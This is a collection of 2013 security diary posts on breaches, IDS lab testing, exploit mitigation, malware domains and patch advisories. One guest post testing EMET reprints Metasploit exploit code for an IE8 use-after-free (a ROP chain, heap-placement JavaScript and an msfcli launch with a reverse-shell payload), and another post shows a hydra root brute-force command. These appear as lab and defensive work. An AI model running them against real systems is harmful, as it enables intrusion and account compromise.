Published: 2013-05-30

Drupal.org & group.drupal.org password disclosure

The Drupal security teams have identified a breach in the environment that has disclosed passwords.  As their notification here --> https://drupal.org/news/130529SecurityUpdate  states most of the passwords were salted and hashed, older passwords were not (although common practice is to store the salt value in the same table as the password, so that might not actually help much).  According to the update they are still investigating what else may have been accessed.  If you have one of those accounts happy password changing.  If you use that password anywhere else (and of course you don't) you might want to change that whilst you are at it.  

From the perspective of letting people know I must say I'm quite impressed.  They notified fairly early on, they provide some details of the incident, steps to take, actions they are taking.  From the breach notifications I have seen recently this is one of the more complete and useful ones.  


Mark H


Published: 2013-05-29

Running Snort on VMWare ESXi

This is a guest diary by Basil Alawi

One of the challenges that face security administrators is deploying IDS in modern network infrastructure. Unlike hubs, switches doesn't forward every packet to every port in the switch. SPAN port or network TAPS can be used as a workaround in the switched environment.

Fortunately with Vmware ESX/ESXi infrastructure we can configure a group of ports to see all network traffic traversing the virtual switch.

"Promiscuous mode is a security policy which can be defined at the virtual switch or portgroup level in vSphere ESX/ESXi. A virtual machine, Service Console or VMkernel network interface in a portgroup which allows use of promiscuous mode can see all network traffic traversing the virtual switch".

By default promiscuous mode policy is set to reject.

To enable promiscuous mode:

  1. Log into the ESXi/ESX host or vCenter Server using the vSphere Client.
  2. Select the ESXi/ESX host in the inventory.
  3. Click the Configuration tab.
  4. In the Hardware section, click Networking.
  5. Click Properties of the virtual switch for which you want to enable promiscuous mode.
  6. Select the virtual switch or portgroup you wish to modify and click Edit.
  7. Click the Security tab.
  8. From the Promiscuous Mode dropdown menu, click Accept.

Performance issues:

Using VMXNET 3 vNIC will provide better performance enhancement than other vNIC types.(Figure 1)

Figure 1(VMXNET 3)

Reserving memory and CPU resources is highly recommended to make sure that the resource will be available when it’s needed. (Figure 2)

Figure 2(Reserved Memory)


The test lab setup


The test lab consists of Vmware ESXi , Kali Linux, Security Onion and Metaspoitable. ESXi  5.1 will be the host system and  Kali VM will be the attack server, while Metaspoitable will be  the victim and Security Onion will run the snort instance.(See Figure 3)

Figure 3 (Test Lab)

Test Lab Network Diagram


The Network Configuration

For this experiment the vswicth has been configured with two ports groups. Virtual Machines port group which the default promiscuous mode is set to the default value "Reject" .The second port group is Promiscuous which the promiscuous mode is set to "Accept" ( See Figure 4) 

Figure 4 (Vswitch Configuration)

The Security Onion has been configured with two network interfaces, eth0 for management with IP and eth1 without IP address. eth0 is connect to the "VM Network" port group and eth1 is connected to the "Promiscuous" port group.




Testing Snort:


The first test is scanning the metaspoitable vm with NMAP by running and snort detected this attempted successfully. (Figure 5)




Figure 5 (Snort alerts for Nmap scans)


The second test is trying to brute forcing metaspoitable root password using hydra (Figure 6):


hydra –l root –P passwordslist.txt ftp




Figure 6  (Hydra brute force alerts)


The third attempt was using metasploit to exploit metaspoitable (See Figure 7).

Figure 7  (metasploit alerts)


Published: 2013-05-27

Nuclear Scientists, Pandas and EMET Keeping Me Honest

Following is a guest post from TJ O'Connor, @ViolentPython, (http://www.linkedin.com/pub/tj-oconnor/43/37/81b), author of Violent Python  SANS Technical Institute graduate, and GSE .

What do Nuclear Scientists, Microsoft, and Metasploit have to do with keeping me honest? As everyone was celebrating the New Year on January of this year, my buddy Russ McRee posted some of my rambling thoughts to the Internet Storm Center about how EMET could protect against unknown future attacks (0-days). At the time, I tested Microsoft Enhanced Mitigation Experience Toolkit (EMET) 3.5 Tech Preview against CVE-2012-4792  found rigged on the Council of Foreign Relations Website. It is fair to say at that time I was working from a very biased perspective. The attack had already occurred and it was easy to look back in time and say EMET would have been successful in protecting against it. As every arm chair quarterback knows, it is easy to look into the past. However, as the boastful and arrogant person I can sometimes be, I claimed EMET could stop future attacks as well against novel exploits (0-days).  On the podcast the following day, Johannes noted my work and effectively said time will only tell. 
Well last fast forward four months. Chinese Hackers from the Deep Panda Group successfully injected a novel exploit into the Department of Labor’s Website  on May 1st, 2013. Arguably, the attack was directed at scientists that likely work in nuclear weapons research based on the content of the page. 
Figure 1: Infected DOE Web Page as seen on May 1, 2003
Maintaining the shift of attacks seen in early 2012, the attackers continued their campaign of watering-hole attacks. Described in a report by Symantec , the term watering hole makes reference to a hunting technique. Rather than search for the herd throughout the forest, hunters sit idly by at the watering hole, knowing the animals will eventually come to drink. Applied to hacking, watering hole attacks apply the same concept: infect a place where you know your target will visit. In the case of the May 1st attack, Deep Panda hoped nuclear scientists would visit a page on dealing with possible exposure to nuclear materials.
After successful exploitation, the exploit downloaded a variant of the Poison IVY Remote Access Toolkit (RAT) (http://www.poisonivy-rat.com), checked for the presence of and attempted to kill popular anti-virus (Avira, Bitdefender, AVG, ESET, Avira, Dr. Web, Sophos, F-Secure, Kaspersky). I’m making assumptions here, but at this point handlers from Deep Panda probably took over the target and began pillaging intellectual property and personal secrets belonging to the scientists. For further information about the attack, check out some great blog posts by Invincea and AlienVault 
Would EMET 3.5 have stopped the attack as I predicted four months earlier? Yes, I am fully aware EMET 4v Beta is available for download.  But I am trying to remain honest to my words from January 1st. Let’s see. The team at Metasploit reproduced the exploit used in the attack and posted the source
Examining the source code from Metasploit version of the exploit (dubbed cgenericelement_uaf since it is a use-after-free for cgenericelement), it appears the attack compromises only targets running Internet Explorer 8 on Windows XP SP3, Vista, Server 2003, or Windows 7 machines. Lets examine a couple minor aspects of the exploit. First, the authors (Sinn3r, Juan Vazquez, and EMH) wrote the exploit to bypass Data Execution Protection using a ROP Chain. This can be seen in Figure 2. In fact, it again uses the msvcrt.dll ROP chain. 
rop_payload = ''
case t['Rop']
when :msvcrt
algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''
if t.name == 'IE 8 on Windows XP SP3'
chain =
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN 
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
 rop_payload = chain + algin + payload.encoded
Figure 2: Msvcrt.dll ROP Chain Creation in ie_cgenericelement_uaf Exploit
Next, the authors used a newly developed Mstime No-Spray Technique to place the encoded payload into the heap. What’s interesting to note is that the new technique for placing shellcode into the heap was only integrated into the Metasploit Framework on April 1st, 2013 by wchen. (https://gist.github.com/wchen-r7/ac29eb40fb33ddb5ab29). Using the CTIMEAnimationBase in Mstime, the technique allocates an array of pointers to controllable strings. As this exploit demonstrates, this only works against Internet Explorer 8 or prior, since IE 9 does not support the function in Mstime. 
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
Figure 3: Mstime No-Spray Technique in ie_cgenericelement_uaf Exploit
So if you put the pieces together, we have a novel exploit (ie – an exploit without a signature), use of the msvcrt.dll ROP chain, a novel method for placing shellcode into the heap (Novel by the standards of EMET 3.5) and some shellcode to execute the Meterpreter. Lets fire up the exploit and browse to it . Figure 4 shows how to successfully start the exploit from the Metasploit framework. Here we will stand up an instance of the exploit on a webserver on TCP Port 8080, and have our payload (the Meterpreter) call back on TCP Port 4444. 
msfcli exploit/windows/browser/ie_cgenericelement_uaf SRVHOST= SRVPORT=8080 payload=windows/Meterpreter/reverse_tcp LPORT=4444 LHOST= E
Figure 4: Launching the ie_cgenericelement_uaf Exploit From Metasploit
We browse the new target at with a victim Internet Explorer 8 on an unpatched Windows XP SP3 and see that the exploit successfully executes its payload, establishing a Meterpreter session on the victim.
Figure 5: Successful Compromise Using ie_cgenericelement_uaf Exploit
Ok, so we know the exploit works. Now lets install EMET 3.5 and repeat the exercise. We’ll begin by enabling all the protection mechanisms that EMET provides. 
Figure 6: Enabling All EMET Protection Mechanisms For Internet Explorer
With EMET 3.5 installed, we attempt the exploit again and EMET 3.5 immediately detects the Stack Pivot included in the msvcrt.dll ROP chain. 
Figure 7: Stackivot Detected By EMET 3.5
Next, we disable the StackPivot detection and protection mechanism in EMET and repeat. This time, the exploit successfully begins the ROP chain but is stopped at 0x77c1110c when the chain attempts to call VirtuAlloc() in an attempt to bypass Data Execution Protection (DEP). EMET 3.5 uses a mechanism to detect who is calling VirtualAlloc() and does not permit it to be called outside of the kernel.  
Figure 8: VirtualAlloc() Caller Checking in EMET 3.5
Ok, we disable the CallerChecking functionality and repeat. This time, the ROP Chain again fails when SimExecFlow detects ROP gadgets in use. SimExecFlow simulates the execution flow after the return address and detects subsequent ROP gadgets. Essentially, EMET 3.5 looks at the stack, sees a series of addresses that point to a couple instructions, followed by a RET-like instruction and identifies the ROP chain. Ok, so this won’t work. 
Figure 9: SimExecFlow Detecting ROP Gadgets in Use
We disable SimExecFlow checking and run the exploit again. This time, the exploit steps the entire way through our ROP chain and successfully places our shellcode into a region of executable memory. However, as soon as the shellcode begins to execute we are presented with a new error message. 
Figure 10: Export Address Table Access Filtering in EMET 3.5
We are reminded that in order to do anything useful (downloading a stager, adding a registry key, adding a user) with shellcode, we need to make calls to the Windows API. By accessing the export address table, shellcode can determine the location of useful APIs (most commonly in kernel32.dll or ntdll.dll). Without accessing the export address table, it proves difficult to find the location of specific required API calls. And thus, EMET 3.5 successfully detects this behavior and ceases the shellcode from executing further. So with several protection mechanisms disabled, EMET completely misses the exploit but catches and stops its payload. 
So at this point, I’m pretty happy. EMET has kept me honest against Deep Panda and their threat towards Nuclear Scientists. What I said four months earlier that EMET 3.5 preventing against novel attacks held very true four months after I said it. But there is a small caveat. Remember that No-Spray method I mentioned? EMET 3.5 failed to detect it in usage. In fact, repeating the exercise with EMET 4v Beta
also missed the No-Spray. Feature request, Microsoft?



Published: 2013-05-24

UDP port 1434 directed attack to AS13489 IP ranges

We have seen today a big rise of incoming packets of what appears to be a SQL Slammer attacks. Some of the detected packets are:

Suspect packet #1

Malicious packet 2

Malicious packet 3

We have seen a sustained rate in many nodes  inside AS13489 and AS27989 nodes of  about 25 Mbps. Some very old SQL servers have been compromised, but the Internet speed has been compromised and navigation it's very slow.

Have you seen something like this today on your AS? Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org


Published: 2013-05-23


Volatility is a Python framework for performing memory forensics. If you haven't tried it yet I highly recommend it. The Volatility Month of Volatility Plugins II is on! As announced here: http://volatility-labs.blogspot.ca/2013/05/whats-happening-in-world-of-volatility.html Volatility 2.3 is entering beta and the second MoVP (Month of Volatility Plugins) has started and is actually in their second installment. Some very exciting new stuff:

1.1 - Mach-O Address Space
1.2 - VirtualBox ELF64 Core Dumps
1.3 - VMware Snapshot and Saved State Analysis
1.4 - New HPAK Address Space
1.5 - ARM Address Space (Volatility and Andriod / Mobile)
2.1 - RSA Private Keys and Certificates
2.2 - Unloaded Windows Kernel Modules

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule



Published: 2013-05-22

Privilege escalation, why should I care?

In my day job I spend about 90% of my time on the red team, performing vulnerability assessment and penetration testing. The rest is spent on threat research, incident response, and digital forensics. Interacting with clients as a consultant I often hear what I term 'interesting' responses. When a penetration tester calls something interesting you should probably pay attention :)

The IDS only listens external to the firewall? SharePoint is directly exposed to the Internet? The WAF protects against attacks therefore we don't have to fix the application? The VMs are all physically on the same host? The DMZ and the internal VLAN are physically on the same switch? You don't bother with privilege escalation patches? All quite interesting.

One of the responses I have heard multiple times is that privilege escalation vulnerabilities are a low priority because they require the attacker have local access. Meaning that that would be very difficult to pull off, therefore we don't have to worry about it. This also assumes that every single account holder is 100% gruntled all of the time, and that nobody ever makes a mistake. Meaning that we can trust everyone who accesses our networks and applications. Which I also find to be 'interesting' :)

There are multiple types of privilege attacks. The first is privilege escalation, where someone who has valid credentials or means to access a network or application can raise their level of access to a more privileged level. Like getting root on a Unix system for example, or becoming Domain admin before lunch on day 1, or assuming a higher role within an application. Impersonation attacks are similar however they entail becoming a different user, often with the same level of privilege, but with way more money in their account :) which soon finds its way to a non-extradition treaty country.

If the major difference between a remote exploit and a local one is that a network connection is required for the former, and not for the latter, does this mean that local priv escalation attacks cannot be performed across the network? Actually no. If an attacker can gain access to a system through a client side exploit, they may then effectively become the local user, and escalate to local system. Local system priv on a Windows computer is just a hop, skip, and jump away from being Domain administrator.

In a recent discussion about the priority to be assigned to patch one comment was "It's only a privilege escalation!". Yes, you are correct, and that is an interesting statement was my response.

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-05-21

Moore, Oklahoma tornado charitable organization scams, malware, and phishing

I find it sad that in times when people are facing disaster, many have died, others missing, and the survivors facing having lost everything that there are scumbags who will try to take advantage. Be very wary of any charity that is raising funds for victims of any disaster, particularly one that has not been around for very long. There are many legit charities, I would recommend sticking to ones you are already familiar with. The American Red Cross for example has been around for a long time, does amazing work, and is always in need of funding. They are just one example of a well established charity that does good work and is already involved in helping out in Moore, Oklahoma.

Routine monitoring of newly registered domain names shows a number of brand new ones that have words like Oklahoma, Moore, tornado, recovery, help, assistance, and similar. I am certain that a number are registered by well meaning people, however I am equally sure that many are fake or scams. It does not take long for any recent newsworthy topic to be the subject line of phishing, malware, and scammers.

Another handler remarked that the new trend seems to be crowd funding, hopefully the money raised will make its way to the charity where it belongs.

Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule


Published: 2013-05-20

Safe - Tools, Tactics and Techniques

Trend Micro published a report last week on a spear-phishing emails campaign that contain a malicious attachment exploiting a Microsoft Office vulnerability (CVE-2012-0158).

This paper identified specific targets:

  • Government ministries
  • Technology companies
  • Media outlets
  • Academic research institutions
  • Nongovernmental organizations

According to the report, "While we have yet to determine the campaign’s total number of victims, it appears that nearly 12,000 unique IP addresses spread over more than 100 countries were connected to two sets of command-and-control (C&C) infrastructures related to Safe.[1]" Another fact of interest is the author of the malware is probably a professional software developer that reused legitimate source code from an Internet services company. Based on the information collected, they found "One key indicator that can be used to detect this network communication is the user-agent, Fantasia."[1] Additional information is available in the report.

If you have collected some malware matching this description, we would be interested to get some samples. You can submit them via our contact form.

[1] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf
[2] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2013-05-20

Ubuntu Package available to submit firewall logs to DShield

I put together a simple .deb package to install our DShield iptables client on Ubuntu. The package is our standard perl client to submit iptables logs, but it is pre-configured for Ubuntu 12.04 LTS. It will submit IPv4 as well as IPv6 logs. Please give it a try and let me know if you run into any issues. For details, see


use our contact form for feedback or send it directly to me at jullrich - at - sans.edu 

The client will install the perl script in /opt/dshield, and all configuration files in /etc/dshield. It will also add an hourly cron job to check /var/log/ufw.log for new logs and mail them to DShield. All parameters can still be further configured via /etc/dshield/dshield.cnf.

To submit logs, we recommend you setup an account. But if you would like to submit anonymous reports, just use "0" as userid.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-19

Port 51616 - Got Packets?

We're looking for any info or packets that target port 51616.   After witnessing a spike yesterday on his network and checking that our port data [1] corroborated his event, Andrew has written in asking what we know.    

The most useful snapshot of port activity can be seen in this graph image.  I ran the graphs as far back as 2006 and nothing more signifcant was illustrated.   The image below highlights yesterdays events as well as a more curious spike back in March.  These counts do not seem very significant at first look, but they could clearly be telling us something.   

Port 51616 - Mar 2013 to May 2013

So drop us a comment to share what you know.  We're interested to attribute this traffic to something useful.

[1] https://isc.sans.edu/port.html?port=51616



Published: 2013-05-17

SSL: Another reason not to ignore IPv6

Currently, many public web sites that allow access via IPv6 do so via proxies. This is seen as the "quick fix", as it requires minimum changes to the site itself. As far as the web application is concerned, all incoming traffic is IPv4. 

The most obvious issue here is logging, in that the application only "sees" the proxies IP address, unless it inspects headers added by the proxy, which will no point to (unreadable?) IPv6 addresses.

But there is another issue: SSL Certificates. If only IPv6 connections are passed via the proxy, you will end up with two different certificate: One for the proxy, and one for the web application (or the IPv4 proxy). It may also happen that the IPv6 and IPv4 site are considered two different hosts on the web server, requiring distinct configurations.

For example, at this point, "www.socialsecurity.gov" uses two different certificates. One for IPv6 and one for IPv4. The IPv6 certifiate is expired, while the IPv4 certificate is valid. This is in particularly painful as some simple comand line tools, like "openssl s_client' are still not able to work over IPv6. For my test, I used gnutls-cli, which works similar to openssl s_client but supports IPv6.

Excerpt from the result:


gnutls-cli -p 443 --x509cafile /opt/local/share/ncat/ca-bundle.crt www.socialsecurity.gov
Processed 291 CA certificate(s).
Resolving 'www.socialsecurity.gov'...
Connecting to '2001:1930:c01::aaaa:443'...
- subject `C=US,ST=maryland,L=baltimore,O=social security administration,OU=diias,OU=Terms of use at www.verisign.com/rpa (c)05,CN=www.socialsecurity.gov', issuer `C=US,O=VeriSign\, Inc.,OU=VeriSign Trust Network,OU=Terms of use at https://www.verisign.com/rpa (c)10,CN=VeriSign Class 3 Secure Server CA - G3', RSA key 1024 bits, signed using RSA-SHA1, activated `2012-04-05 00:00:00 UTC', expires `2013-04-29 23:59:59 UTC', SHA-1 fingerprint `3286afd908f256947b396dbae88d37b111c9aaaf'
- Status: The certificate is NOT trusted. The certificate chain uses expired certificate. 
*** Verifying server certificate failed...
*** Fatal error: Error in the certificate.
*** Handshake has failed
GnuTLS error: Error in the certificate.

Next, lets try IPv4. A disadvantage of gnutls-cli is that you are not able to force an IPv4 connection, so I will just fall back to openssl here:

$ openssl s_client -connect www.socialsecurity.gov:443 -CAfile /opt/local/share/ncat/ca-bundle.crt
subject=/C=US/ST=maryland/L=baltimore/O=social security administration/OU=diias/OU=Terms of use at www.verisign.com/rpa (c)05/CN=www.socialsecurity.gov
issuer=/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)10/CN=VeriSign Class 3 Secure Server CA - G3
And after saving the certificate to a file:
$ openssl x509 -in /tmp/ssa.gov -text
        Not Before: Apr 22 00:00:00 2013 GMT
        Not After : Apr 30 23:59:59 2017 GMT
        Subject: C=US, ST=maryland, L=baltimore, O=social security administration, OU=diias, OU=Terms of use at www.verisign.com/rpa (c)05, CN=www.socialsecurity.gov
So in short: two different certificates for the same host name. This isn't always bad, and not uncommon. But all certificates have to be valid!

------ Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter


Published: 2013-05-17

e-netprotections.su ?


Like with .biz, I sometimes have the impression that .su and .cc could be sinkholed in their entirety, because the bad domains seem to vastly outnumber whatever (if any) good is running under these TLDs as well.

Earlier today, ISC reader Michael contacted us with information that several PCs on his network had started to communicate with iestats.cc, emstats.su, ehistats.su, e-protections.su and a couple other domains. I was pretty sure that I had seen the latter domain on an earlier occasion in a malware outbreak, but I couldn't find it in our records .. until I only searched for "e-protections", and found e-protections.cc. This domain had been implicated back in October 2012 in a malware spree that was linked to the nasty W32.Caphaw, a backdoor/information stealer. The similarity of the names was too much of a coincidence, and it meant bad news for Michael.

Looking at what was captured by some of our network sensors allowed to reconstruct a (partial) picture of the IPs and ASN's involved in today's malware wave

Domain IP AS Provider Country
ppetoc.iestats.cc 30517 Great Lakes Comnet USA
ppetoc.iestats.cc 8972 PlusServer Intergenia AG Germany
ppetoc.iestats.cc 40676 Psychz Networks USA
ppetoc.iestats.cc 24940 Hetzner Online AG Germany
ppetoc.iestats.cc 57172 Global Layer B.V. Netherlands

The host name portion for some of the domains looks like it is time dependent (incrementing ascii) whereas other domains use (apparently) random names like d3acofzi7hjft.e-protections.su. Name servers involved today include ns1.abercrombienfr.net (currently - AS1426) and ns1.semi-spa.net (currently - AS50300). I doubt the former has anything to do with the clothing store, the domain was created four months ago.

Closer inspection of Michael's PCs revealed that each infected box was apparently running a slightly different version of the EXE. Anti-Virus coverage is still thin (Virustotal) , but the Heuristics of some products seem to be catching on. This sample looks more like a ransomware trojan than Caphaw, but we'll know more once we analyze all the information gathered so far.

If you have information to add on this particular malware or the domains mentioned, please comment below, or use our contact form.



Published: 2013-05-16

Extracting signatures from Apple .apps

As an add-on to ISC Handler Lenny Zeltser's earlier diary on extracting certificates from signed Windows binaries, here's how to do the same on a Mac. Given that today's blog over at F-Secure documents a screenshot-taking Mac spyware that is signed with a developer ID, signed bad .apps might actually be more prevalent than expected.

To verify and extract signatures and certificates on an Apple .app, you can do (example Mail.app)

codesign -dvvvv --extract-certificates  /Applications/Mail.app

This will save the certificates in DER format, named codesign0, codesign1, etc. These can then be displayed as usual with OpenSSL

openssl x509 -inform DER -in codesign0 -text



Published: 2013-05-16

Cisco TelePresence Supervisor MSE 8050 Denial of Service Vulnerability

Cisco TelePresence Supervisor MSE 8050 contains a vulnerability that may allow an unauthenticated, remote attacker to cause high CPU utilization and a reload of the affected system.

Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link:


-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler


Published: 2013-05-15

Call for Papers - 4th annual Forensics and Incident Response Summit EU


The 4th annual Forensics and Incident Response Summit EU will take place on October 6-13 in Prague, one of the most historical European cities, in the context of the SANS Forensics Prague conference, the biggest Incident Response and Digital Forensics event in Europe to date.

The Summit will focus on high quality and extremely relevant content as well as panel discussions in Digital Forensics and Incident Response. In addition, we encourage you to take every opportunity to make the most of this event from attending the Summit to registering for one or more of the post-summit training classes taught by SANS' top-rated instructors and course authors. Additional events such as DFIR Netwars, evening talks and the SANS Community Night will be taking place during that week too. This event promises to bring together the leading minds in digital forensics and incident response in the EU, as well as many other practitioners from a wide cross section of industries and company sizes. You will be able to share with all of them your challenges and find out new solutions that work, techniques and approaches you didn't even know existed. Call for Speakers - Now Open The 4th annual Forensics and Incident Response Summit Call for Speakers is now open.

If you are interested in presenting or participating on a panel we are looking for user-presented case studies with communicable lessons. The Forensics Summit offers speakers opportunities for exposure and recognition as an industry leader. If you have something substantive, challenging, and original to offer, you are encouraged to submit a proposal.

Benefits of Speaking

  • Promotion of your speaking session and company recognition via the Forensic conference website and all printed materials
  • Visibility via the Forensic post-conference presentation email link for many months following the conference
  • Full conference badge to attend all Summit sessions
  • Private speaker lunch

Submission Guidelines

  • Title
  • Author Name(s)
  • Author Title
  • Company
  • Speaker Contact Information: Address, phone number, email address
  • Biography
  • Your biography should be approximately 160 words. You may include your current position, titles, areas of professional expertise, experience, awards, degrees, personal information, etc.
  • Abstract
  • The presentation abstract should outline your presentation and what attendees will learn. All content must be strictly educational.
  • The presentation should be relevant to: Media Exploitation Analysts, Legal, Incident Response Teams, Security Operations and Law Enforcement professionals.

Speaking Options:

  • Presentation: 45 minutes
  • Question & Answer: 10-15 minutes Submit your submissions to callforpapers-prague@sans.org by June 15, 2013 with the subject "SANS DFIR Summit EU CFP 2013."

Thank you for your interest in presenting

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler


Published: 2013-05-14

CVE-2013-2094: Linux privilege escalation

A vulnerability was discovered using fuzzing in linux kernels 2.6.37 till 3.8.9. The vulenrability requires the kernel to be compiled with PERF_EVENTS, but unfortunately that seems the case for quite some linux distributions. CentOS even backported the vulnerability to 2.6.32.

Impact is local privilege escalation, and exploit code is readily available.

More information: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094

Hat tip: James for sending us some pointers to this.

Swa Frantzen -- Section 66


Published: 2013-05-14

Microsoft Security Advisory 2846338

Microsoft today also release security advisory 2846338 indicating that they have update their Malware Protection Engine (used in a varierty of their anti malware products) to fix a vulnerability in said engine where an attacker would be able to execute random code in the context of LocalSytem. Micorosft claims the vulnerability was publicly disclosed as a DoS.

CVE: CVE-2013-1346


Swa Frantzen -- Section 66


Published: 2013-05-14

Firefox & Thunderbird released

Mozilla decided to join the mayhem on Black Tuesday this month and released Firefox and Thunderbird.

This updates to:

  • Firefox 21.0
  • Firefox ESR 17.0.6
  • Thunderbird 17.0.6
  • Thunderbird ESR 17.0.6

Release notes:


Security content o fthe updates:


Swa Frantzen -- Section 66


Published: 2013-05-14

Microsoft May 2013 Black Tuesday Overview

Overview of the May 2013 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS13-037 The usual monthly MSIE cumulative patch, adding fixes for 11 more vulnerabilities. All but one are use after free vulnerabilities. The odd one is about vbscript allowing read access to JSON data related to another domain.
Replaces MS13-028.

KB 2829530 No publicly known exploits Severity:Critical
Critical Important
MS13-038 The anticipated IE8 fix.
Note that IE9 is listed as affected as well, but it's not given a rating "because the known attack vectors for the vulnerability discussed in this bulletin are blocked in a default configuration."
Note that this is not the cumulatieve IE patch, nor is the fix part of the cumulative patch this month. The bulletin states there is no need to uninstall the MSFT Fix-it released earlier for this vulnerability.

KB 2847204 Publicly discussed and exploit code available. Security advisory 2847140 Severity:Critical
PATCH NOW Important
MS13-039 A vulnerability in the handling of HTTP headers in the HTTP stack allows a Denial of Service.

KB 2829254 No publicly known exploits. Severity:Important
Important Important
MS13-040 Incorrect validation of signed XML files allows for failing to detect changes in said files and an authentication bypass allowing unauthenticated access. The impact of these vulnerabilities high depends on what applications make use of these features.
Replaces MS10-041.

KB 2836440 Microsoft claims the vulnerability CVE-2013-1337 was publicly disclosed. Severity:Important
Important Important
MS13-041 A memory corruption vulnerability allows random code execution in the context of the current user.
Note the lync user level install of Lync 2010 Attendee is only available from the Microsoft Download Center - not via automatic updates.
Replaces MS12-066.

KB 2834695 No publicly known exploits. Severity:Important
Critical Important
MS13-042 A multitude of vulnerabilities in Publisher allow random code execution.
Replaces MS11-091.

KB 2830397 No publicly known exploits Severity:Important
Critical Important
MS13-043 Incorrect handling of shape data in word allows random code execution with the rights of the logged on user.
Note that when word is used to read incoming email messages, it can be affected merely via previewing incoming emailed RTF data!

KB 2830399 No publicly known exploits Severity:Important
Critical Important
MS13-044 A problem in handling XML files that references external files in Visio allows information leak and read access with the rights of the logged-on user.
Replace MS11-060 and MS13-023.

KB 2834692 No publicly known exploits. Severity:Important
Important Important
MS13-045 Windows Writer - part of the Windows Essentials package - is a client to manage blogs. The vulnerability allows overriding proxy settings and overwriting files accessible to the logged-on user.
Windows Essentials

KB 2813707 No publicly known exploits Severity:Important
Critical Important
MS13-046 Multiple vulnerabilities in Kernel Mode Drivers allow privilege escalation.
Replaces MS13-036 and MS13-031.
Kernel Mode Drivers

KB 2840221 No publicly known exploits Severity:Important
Imporant Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

Swa Frantzen -- Section 66


Published: 2013-05-14

So what passwords are those ssh scanners trying?

If you run an ssh server (especially if you still run it on the default port), you've no doubt had plenty of folks scan your machine and do password guessing attacks against it.  BTW, you'll never get in mine that way, I only allow public/private key authentication, but that is beside the point here.  I've done a couple of other reports analyzing passwords, and I really like pipal by Robin Wood for much of the analysis (you can grab it from here).  I've been running a kippo ssh honeypot for the day job for about 2 years and I've done a couple of reports on the password guesses for the ThreatTraq webcast, but then I discovered that in addition to firewall logs and the 404 logs, we also collect kippo logs here at the SANS Internet Storm Center.  Ooh, more data!!  If you'd like contribute, please grab https://isc.sans.edu/kipposcript.pl.  So, without further ado, here is what I've found in our kippo data (as of about 15 April 2013).  I should note here, though, that these are the guesses the bad guys are making.  They've developed their lists most likely based on what has worked for someone at some point, so they will be somewhat different from what you find in analyzing passwords from breaches like my analysis of last year's Yahoo breach.

The Basics

Total entries = 15415314
Total unique entries = 46840


The Results

Top 10 passwords
